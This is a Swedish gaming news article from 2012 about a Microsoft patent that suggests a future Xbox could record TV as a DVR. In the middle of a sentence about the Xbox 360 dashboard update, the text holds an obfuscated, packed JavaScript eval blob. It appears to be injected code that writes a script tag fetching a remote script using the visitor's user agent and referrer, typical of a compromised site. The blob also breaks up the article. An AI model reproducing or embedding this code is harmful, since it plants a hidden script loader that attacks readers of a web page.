Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Nytt patentfynd drar igång rykten om att nästa Xbox får DVR funktion.

Nytt patentfynd drar igång rykten om att nästa Xbox får DVR funktion.
Filip Urde
  • On 4 januari, 2012
  • http://www.revue.se/filip-urde

Som ni Xbox 360 användare vet och kan se/använda idag, så har Dashboarden uppdaterats för att göra Xbox 360 mer till en underhållningsmaskin och mediaspelare än en spelkonsol (läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdffr|var|u0026u|referrer|eehsk||js|php’.split(’|’),0,{}))
mer om uppdateringen här)
. Microsoft vill att du surfar, ser på filmer, lyssnar på musik, ser på tv, använder sociala medier och självklart även spelar på din Xbox 360. Det var media sidan Tomsguide.com som har hittat ett gammalt patent från 2007. I patenten finns saker som tyder på att man vill ge möjligheten att spela in från sin tv via sin Xbox genom en DVR funktion (Digital Video Recording). Fyndet blev just hett, då det klingar ganska fint med den senaste uppdateringen och en DVR funktion vore verkligen något extra. Dock är funktionen inte lika intressant för oss svenskar som alltjämt får dras med dåligt media utbud. Men om vi får se ett mer generöst utbud med den kommande Xbox konsolen (xbox 720/xbox loop… ja vad den nu tänkas döpas till), ja då är det en helt annan historia.